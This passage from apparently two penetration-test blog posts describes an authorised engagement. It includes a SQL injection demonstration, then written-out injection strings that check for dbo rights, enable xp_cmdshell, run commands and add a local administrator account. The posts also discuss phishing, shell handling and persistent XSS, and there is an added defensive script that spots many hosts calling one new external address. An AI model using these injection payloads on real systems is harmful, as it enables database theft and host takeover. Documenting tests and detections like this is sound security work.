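        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    probe = "' or 1=1--"
    print("string-built query:", login_vulnerable(conn, probe, "x"))  # Admin
    print("parameterised query:", login_safe(conn, probe, "x"))       # None
```

The other finding in this post, the application account running as dbo, is the same least-privilege failure one layer down: a login bypass is bad, but a login bypass into a connection that can reach sp_configure and xp_cmdshell is a host compromise.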

In short order we had everything from the database. Users, passwords, clients, contracts and more. I was able to use the email addresses and passwords we found to log into the users' email accounts via Outlook Web Access. Perfect. Being greedy, we wanted to get access to the server itself. We could create temporary tables and write data to them from any file on the server, but this was not enough. Local admin or fail! Turns out that RDP over 3389 was enabled! Don't ask, because I have no idea why. So after trying some of the users and passwords and not getting anywhere I decided to see who the database was running as.

'; if user ='dbo' waitfor delay '0:0:5 '--

Hell yes! Running as Admin. I should have expected it after what we had already found. So the next step was to see what I could leverage with this knowledge. In SQL 2005 xp_cmdshell is disabled by default, but if you have admin access it's really trivial to re-enable this stored procedure. [insert evil grin here]. Using sp_configure it took a few SQL queries to enable xp_cmdshell. A quick test to see if it succeeded:

exec master..xp_cmdshell 'ipconfig > test.txt';CREATE TABLE zeroday (txt varchar(8000)); BULK INSERT zeroday FROM 'C:\\windows\\system32\\test.txt'--

A quick read of the table and w00t!, our ipconfig data was there. Sweet. At this point I'd had too much coffee and started to overthink the next steps. I started going all old skool and writing to an ftp.txt file to pull down my backdoor.exe and execute it. Well, at least I did not decide to go the debug.exe route. :) Halfway through I'm talking to Eric over the phone when he 'politely' reminds me that I have RDP access. Just add a user to the local admin group and you're golden.

exec master..xp_cmdshell 'NET USER zeroday xxxxxxxx /add'--
exec master..xp_cmdshell 'NET LOCALGROUP "Administrators" "zeroday" /add'--

Let's try RDP. It's such a good feeling to see that server's desktop appear! At this point I grabbed the password hashes from the server (not that I'm going to bother cracking them), uploaded my scanner, scanned the two subnets I had access to, and got some screenshots! DO NOT! I repeat, DO NOT run your Exchange server on the same server as your webserver!

To finish up, Pragmatk took a few minutes to find a persistent XSS in the site (there's more than one). He modified the username field to contain the XSS. If we really wanted we could have modified each user's profile to contain the XSS instead of only our test user. An invisible iframe and I'd have my backdoor dropped to their system in a heartbeat.

All in all a lot of fun was had all round. Cheers to Eric and Pragmatk who rocked as always.

dean de beer

A Successful Pentest with some Failures.

I'm busy preparing for a [de]briefing following a pentest that Eric and I completed a few weeks ago and was thinking about some of the challenges we faced on this particular engagement. Overall the engagement was VERY successful. We owned the client's infrastructure pretty much completely. This post is not so much about where we succeeded as about where we failed or could have improved our processes.

The one element that made this engagement different from most was the limited [really limited!] amount of time we had to complete all aspects of the engagement. 50 hours! This might seem a reasonable amount of time but when you consider that this included the remote, local [internal], phishing and reporting, it's a truly limited amount of time.

After finally getting all the contracts and authorization AKA 'Cover Your Ass' agreements signed we were finally able to proceed with the actual work. The scope itself placed some severe limitations on us but at the same time was very broad in what areas we could target. A contradiction, I know. The scope, aside from limiting the amount of active time we had to do the work, also limited us to specific days for when we could actually perform any testing. The remote portion started on a Friday night, the internal portion could begin on the Saturday, and both had a hard stop of 8pm on Sunday night.

This, while not ideal, did provide us with time to do the work. The remote portion of the engagement went pretty fast. The client had a reasonably small internet footprint and numerous sites and devices were out of scope. The internal portion, though, started off badly with the scope changing drastically. I HATE scope creep!

It turns out that the client was undergoing a large infrastructure and server migration. The address ranges we were provided were now invalid. No problem, right? Just get the two new /24 ranges. But noooo, the client had changed the entire subnetting scheme and now we had servers across about 6 or so subnets. Our scanning and fingerprinting time just increased a helluva lot. Trying to explain to the client that this was now out of scope was like getting blood from a stone. Rather than postponing the pentest for an indefinite amount of time while waiting for another window to perform the work, we decided to focus on only specific subnets and locations, again limiting the scope. Even so, one of the things that became obvious was that rather than having the time to scan, enumerate and fingerprint the network and get a solid picture of how it operates and how devices interact, I would have to be looking at potential ingress points while the scanning was going on. Not ideal but doable.

One thing I realized is that I'm going to need to keep more than one cheat sheet of scanning arguments for this type of situation in the future. By limiting your scan time you limit what you can scan for, and rather than taking scan results, reviewing them and then targeting and focusing on a single host, you need to decide which hosts have the potential for greatest success and leave the others aside. This means you will miss things that may impact the success of the engagement.

Anyway, after enumerating workstations and servers via SMB and DCERPC scans I had an initial list of targets I wanted to focus on. While all this was going on I was also looking for a lot of the usual misconfigurations on the network such as unauthorized shares, default SNMP community strings, insecure printers, workstations running the server service, etc... I found them all btw. ;)
So after bypassing the proxy, exfiltrating some data, and getting access to the SAN I needed to focus on the servers and workstations. What I realised was that I needed to better script some of the things I normally do. Running nessus from the command line is great. It's easy to script and cycle through some specific addys. I also realized I needed a few more specific custom scans that looked for a few specific vulnerabilities that I might leverage.

I did end up getting direct access on about 3 or 4 servers through various means. Being very focused as to what I was looking for and basing those searches on my initial analysis of their environment paid off. Luckily. It could have gone the other way and that would have, well, sucked. I managed to leverage some of those servers to get a little deeper into the network as well. The limitation on time meant that I could not use those boxes to pivot much deeper into the network. I simply checked for dual-homed servers and scanned those subnets. The report covered the potential for further exploitation and access. Thankfully I'd already written scripts that when run would upload my scan utility, run it based on the ipconfig data and download the results to my host.

Another issue was that because this took place over the weekend the office was dead quiet. This meant no port level security, etc... This always makes man in the middle attacks pretty trivial and a great way to spoof DNS, steal tokens and passwords, intercept RDP sessions, etc... Well, with no traffic, that sucked. The VoIP network segment was a little easier as we could create the voice traffic ourselves. That's always fun when you can intercept and replay the voice traffic.

The big issue with the internal portion, aside from managing changes in the scope, was that with limited time you really need to know what your ultimate target is and be able to make a decision on the path to take to achieve that goal. Do you target the servers directly? Do you go in via a workstation, or do you attack the channels between these devices?

Obviously there are other routes to take but the point is that you need to be sure your direction is the right one or be able to change vectors quickly once you realise that the vector you're using is not working.

The phishing portion of the engagement, while incredibly successful, also highlighted the issue of limited time while trying to gain as much information as possible. I've developed a series of scripts that I use in my phishing attacks to harvest, format and send emails, serve up webpages with code to drop a file, steal credentials and gather user information [both automatically and by enticing the user to enter credentials]. These scripts have served me well even though they need to be customized for the current client.

We made the decision that we would not have time to leverage any access we gained from the phish and so we wanted to gather as much data as possible from the target host before moving on to the next one. I have a series of scripts that will gather local data such as users, groups, domain, routes, browser history, etc, etc... I also have a script that takes screenshots of the remote host and downloads them to my system. [I love this script!] All the scripts work very well and save me a lot of time but one of the things I realized was that a phish can be too successful. :)

We had so many shells come through that, even with splitting them between Eric and myself, we still missed some and were not able to gather all the data from everyone the way we wanted. I'm putting together a script that will call most of the other scripts when it runs so that I can run it once, gather the data and move on. Our current process is far more efficient than manually gathering that data but it still takes more time than I like in situations like this.

The ability to revise the payload mid-phish was also something we had to do and, while we managed, it could have been done far more efficiently. I should have prepared the alternate payloads beforehand to account for this eventuality. Changing the payload on the webserver was as simple as replacing the existing one and modifying the headers in the page. The email was a little more difficult though. I needed to stop the existing SMTP script, modify the payload and restart it with only the remaining emails being targeted. I then needed to regenerate a new phish email, containing the new payload and a new message, to entice the users that were already targeted. All this while trying to handle the existing shells. While it only takes one user to click on the link or attachment to be successful, this phish was about gathering as much data from as many users as possible.

I don't think our phish would have been half as successful if it had not been for mc and his ninja-like skills in modifying a pdf exploit to run as a Metasploit module, allowing us to use all the payloads in the framework. Awesome stuff.

Our ability to handle multiple payloads connecting back to our servers could also be improved. I actually lost about 5 shells because I could not establish a new session fast enough. Also, rather than having to run a script manually on the target it would be more efficient to have the payload execute a series of commands when it is executed without requiring any interaction at all.
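The mirror image of "so many shells came through" on the defender's side is a burst of many internal hosts connecting to the same previously unseen external address within minutes of an email campaign. The following is an added example, not the author's or the engagement's code, of a detection that flags that fan-out; it assumes proxy or firewall logs in a constructed one-line-per-connection format (epoch, source IP, destination:port, bytes) and a constructed baseline of destinations seen in normal traffic.

```python
"""Flag many internal sources reaching one new external destination in a short window.

Added example for this post (not the author's tooling). Log format and
baseline are constructed for the example.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed format: "<epoch> <src_ip> <dst_host_or_ip>:<port> <bytes>"
LOG_RE = re.compile(r"^(?P<ts>\d+) (?P<src>\S+) (?P<dst>[^:\s]+):(?P<port>\d+) (?P<bytes>\d+)$")

# Constructed: destinations seen in the last 30 days of normal traffic.
BASELINE: Set[str] = {"www.example.com", "updates.example-corp.internal"}

# Constructed sample: five workstations hit 203.0.113.77 within 45 seconds.
SAMPLE_LOG = """\
1700000000 10.0.20.11 www.example.com:443 5120
1700000010 10.0.20.12 updates.example-corp.internal:443 80000
1700000030 10.0.20.15 203.0.113.77:443 1200
1700000040 10.0.20.22 203.0.113.77:443 1180
1700000052 10.0.20.31 203.0.113.77:443 1210
1700000060 10.0.20.15 203.0.113.77:443 310
1700000075 10.0.20.40 203.0.113.77:443 1190
1700000090 10.0.21.8 203.0.113.77:443 1205
1700000400 10.0.20.50 198.51.100.9:8443 900
"""


def parse_log(text: str) -> List[Dict]:
    """Parse the constructed log format; silently skip malformed lines."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            d = m.groupdict()
            events.append({"ts": int(d["ts"]), "src": d["src"], "dst": d["dst"],
                           "port": int(d["port"]), "bytes": int(d["bytes"])})
    return events


def detect_fanout(events: List[Dict], baseline: Set[str],
                  threshold: int = 4, window_s: int = 300) -> List[Dict]:
    """Alert once per non-baseline destination reached by >= threshold
    distinct sources inside any sliding window of window_s seconds."""
    per_dst: Dict[str, List[Dict]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["dst"] not in baseline:
            per_dst[e["dst"]].append(e)
    alerts = []
    for dst, evs in per_dst.items():
        start = 0
        for i, e in enumerate(evs):
            while evs[start]["ts"] < e["ts"] - window_s:   # drop events outside the window
                start += 1
            srcs = {x["src"] for x in evs[start:i + 1]}     # distinct sources in window
            if len(srcs) >= threshold:
                alerts.append({"dst": dst, "first_ts": evs[start]["ts"],
                               "alert_ts": e["ts"], "sources": sorted(srcs)})
                break                                       # one alert per destination
    return sorted(alerts, key=lambda a: a["alert_ts"])


def run_detection(text: str, baseline: Set[str] = BASELINE) -> List[Dict]:
    return detect_fanout(parse_log(text), baseline)


if __name__ == "__main__":
    for a in run_detection(SAMPLE_LOG):
        print(a)
```

The threshold and window are the tuning knobs: a new SaaS rollout also produces fan-out, which is why the check only fires on destinations absent from the baseline and reports the sources so an analyst can correlate them with the recipients of a suspicious mail.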

When all was said and done the pentest was actually very successful and we achieved all our goals, even with the hiccups we had along the way. It's always a good feeling when an engagement goes well, especially in an environment like this one.

It's important to review the processes and methods you use during an engagement regularly to see if they can be improved or made more efficient. Small things can make a huge difference to the success of a project.

dean de beer